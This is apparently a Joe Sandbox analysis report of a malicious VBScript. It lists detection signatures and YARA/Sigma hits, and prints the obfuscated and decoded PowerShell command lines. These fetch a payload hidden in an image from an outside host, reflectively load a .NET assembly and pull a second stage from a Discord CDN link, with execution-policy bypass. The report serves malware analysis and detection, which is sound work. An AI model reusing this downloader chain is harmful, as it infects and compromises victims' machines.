Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.vbs

Overview

General Information

Sample name:file.vbs
Analysis ID:1446642
MD5:a96d75d4c749261992415e1d391a0136
SHA1:6751edf6ff40d11d8244b357dd1bdd3dfd2ff6ce
SHA256:c405b1d1c722ca217decbe4e31d2a5e760cb77a8a9731690a96e810a0db45e1c
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive JS / VBS script found (domain check)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreYgBlDgTreGUDgTreMDgTreBlDgTreDMDgTreZQDgTre2DgTreGQDgTreMQBhDgTreDMDgTreNDgTreDgTrezDgTreDgDgTreMDgTreDgTre2DgTreDIDgTreYwBlDgTreGEDgTreMgDgTreyDgTreDcDgTreNDgTreBjDgTreDEDgTreMDgTreDgTre2DgTreGIDgTreNQBjDgTreDgDgTreYQBmDgTreDcDgTreYwBhDgTreDQDgTreYgDgTre5DgTreDgDgTreODgTreBhDgTreDkDgTreOQBjDgTreGIDgTreZQDgTre4DgTreGUDgTreMwBjDgTreDcDgTreMwDgTre4DgTreDIDgTreNQBkDgTreGIDgTreODgTreDgTre5DgTreDgDgTreNgDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreOQBhDgTreGMDgTreMwDgTrezDgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreMQBjDgTreDEDgTreNQDgTrezDgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZQBsDgTreGkDgTreZgDgTrevDgTreDUDgTreODgTreDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDYDgTreMgDgTrewDgTreDUDgTreNwDgTreyDgTreDEDgTreNDgTreDgTre2DgTreDUDgTreMwDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBkDgTreGUDgTrecwBhDgTreHQDgTreaQB2DgTreGEDgTreZDgTreBvDgTreCcDgTreLDgTreDgTrenDgTreEEDgTreZDgTreBkDgTreEkDgTrebgBQDgTreHIDgTrebwBjDgTreGUDgTrecwBzDgTreDMDgTreMgDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
file.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 1316JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 1316INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xf2e27:$b2: ::FromBase64String(
      • 0xf37e2:$b2: ::FromBase64String(
      • 0xf497b:$b2: ::FromBase64String(
      • 0xf502b:$b2: ::FromBase64String(
      • 0xf57fe:$b2: ::FromBase64String(
      • 0xf5e63:$b2: ::FromBase64String(
      • 0xf2c8c:$b3: ::UTF8.GetString(
      • 0xf3647:$b3: ::UTF8.GetString(
      • 0xf47e0:$b3: ::UTF8.GetString(
      • 0xf4e90:$b3: ::UTF8.GetString(
      • 0xf5663:$b3: ::UTF8.GetString(
      • 0xf5cc8:$b3: ::UTF8.GetString(
      • 0x20769:$s1: -join
      • 0xa9f48:$s1: -join
      • 0xf743b:$s3: reverse
      • 0xf7729:$s3: reverse
      • 0xf7e43:$s3: reverse
      • 0xf85fc:$s3: reverse
      • 0xff7b4:$s3: reverse
      • 0xffbce:$s3: reverse
      • 0x100756:$s3: reverse
      Process Memory Space: powershell.exe PID: 1988JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1988INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x40754:$b2: ::FromBase64String(
        • 0x48df5:$b2: ::FromBase64String(
        • 0x405b9:$b3: ::UTF8.GetString(
        • 0x48c5a:$b3: ::UTF8.GetString(
        • 0x15df0:$s1: -join
        • 0x16503:$s1: -join
        • 0x33eea:$s1: -join
        • 0x5ec0f:$s1: -join
        • 0x6bce4:$s1: -join
        • 0x6f0b6:$s1: -join
        • 0x6f768:$s1: -join
        • 0x71259:$s1: -join
        • 0x7345f:$s1: -join
        • 0x73c86:$s1: -join
        • 0x744f6:$s1: -join
        • 0x74c31:$s1: -join
        • 0x74c63:$s1: -join
        • 0x74cab:$s1: -join
        • 0x74cca:$s1: -join
        • 0x7551a:$s1: -join
        • 0x75696:$s1: -join
        SourceRuleDescriptionAuthorStrings
        amsi64_1988.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Spreading

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&bee0e3e6d1a3438062cea2274c106b5c8af7ca4b988a99cbe8e3c73825db8986=mh&d9ac3366=si&d1c15366=xe?txt.elif/5863426205721465321/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method =

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDg